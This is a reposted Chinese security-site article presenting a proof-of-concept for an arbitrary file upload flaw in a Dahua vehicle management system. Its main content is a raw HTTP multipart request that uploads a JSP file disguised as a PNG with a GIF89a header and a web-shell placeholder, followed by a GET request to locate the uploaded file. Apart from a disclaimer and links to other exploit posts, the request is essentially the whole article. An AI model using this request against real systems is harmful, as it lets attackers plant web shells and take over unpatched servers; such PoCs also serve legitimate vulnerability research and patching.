大华车载系统任意文件上传漏洞PoC

2024年9月28日14:21:49评论35 views字数 533阅读1分46秒阅读模式

POST /vehicleServer/carDev/icon/import/1?iconType=1HTTP/1.1 Host:ip:port
Accept:*/* Accept-Encoding:gzip，deflate，br
Content-Length:872
Content-Type:multipart/form-data;boundary=----63766573e5ae9ee9aa8ce5aea4
User-Agent:Mozilla/5.0(Windows NT 6.2;Win64;x64) AppleWebKit/537.36(KHTML
-----63766573e5ae9ee9aa8ce5aea4
Content-Disposition: form-data; name="file"; filename="test.jsp" Content-Type: image/png
GIF89a
<%jsp 马%>------63766573e5ae9ee9aa8ce5aea4-- 获取路径:
GET /vehicleServer/carDev/icon/getIconList?nowTime=164605907220

原文始发于微信公众号（左逆安全攻防）：大华车载系统任意文件上传漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

EnGenius usbinteract.cgi 未授权远程命令执行

红帆HFOffice SQL注入漏洞

家装ERP管理系统SQL注入漏洞

工具 | DD-security-tool

JieLink+智能终端操作平台SQL注入漏洞

Cleo Harmony /Synchronization 任意文件读取漏洞 POC

漏洞预警杭州三X SMG网关管理软件 changelogo.php 命令执行漏洞

CVE-2024-56145：Craft CMS RCE POC

泛微E-cology前台远程代码执行漏洞风险通告

CVE-2025-32433 - Erlang/OTP SSH 中的严重 RCE（CVSS 10）

本文由 admin 发表于 2024年9月28日14:21:49
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
大华车载系统任意文件上传漏洞PoChttps://cn-sec.com/archives/2008273.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

大华车载系统任意文件上传漏洞PoC

EnGenius usbinteract.cgi 未授权远程命令执行

红帆HFOffice SQL注入漏洞

家装ERP管理系统SQL注入漏洞

工具 | DD-security-tool

JieLink+智能终端操作平台SQL注入漏洞

Cleo Harmony /Synchronization 任意文件读取漏洞 POC

漏洞预警杭州三X SMG网关管理软件 changelogo.php 命令执行漏洞

CVE-2024-56145：Craft CMS RCE POC

泛微E-cology前台远程代码执行漏洞风险通告

CVE-2025-32433 - Erlang/OTP SSH 中的严重 RCE（CVSS 10）

发表评论

在线咨询

微信